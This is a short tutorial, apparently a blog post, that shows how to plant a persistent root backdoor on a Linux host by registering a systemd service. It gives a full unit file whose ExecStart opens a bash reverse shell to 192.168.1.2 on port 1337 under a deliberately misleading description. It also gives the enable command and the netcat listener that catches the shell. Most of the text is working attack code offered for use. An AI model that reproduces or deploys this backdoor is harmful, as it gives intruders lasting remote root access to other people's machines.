Image by PublicDomainPictures on Pixabay
Some programs are nice to start every time the system boots. The use cases can vary from web services to persistent malware. Your imagination is the limitation.
In this article, I will provide a simple method of creating a simple backdoor service that is managed by SystemD on a Linux host.
Reverse Shell Service
Persistent access to remote host
Do you ever find yourself in a situation where it would be nice to have persistent access to a remote host even after it reboots? Well, then a SystemD service is a simple means to that end.
To get this working you will need to have root-level permissions on the host.
Start off by creating a service definition file that you store somewhere on the system. In this example, we place it in the /tmp directory.
vim /tmp/root4you.service
[Unit]
Description=This is not the evil service you are looking for...
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/1337 0>&1'
[Install]
WantedBy=multi-user.target
This file will be used to add a entry to SystemD. To add the service to SystemD, and enable it to be executed at system startup run this command:
systemctl enable /tmp/root4you.service
Once the service is added to SystemD, the file is no longer needed.
The service will start a reverse shell that will try to connect to the IP address 192.168.1.2, on port 1337. To establish a reverse shell the host using that IP address must have Netcat listening for a reverse shell on the same port.
nc -nlvp 1337
Manage service
Start, Stop and Status
Now this service can be managed just like any other SystemD managed service with these commands:
systemctl start root4you
systemctl stop root4you
systemctl status root4you
Since the service is enabled in SystemD it will start the next time the host boots. But right now it is not running. To start the service, and to test its functionality you will need to start it manually.
Removal
Clean up the mess
To remove the service from SystemD, simply disable it
systemctl disable root4you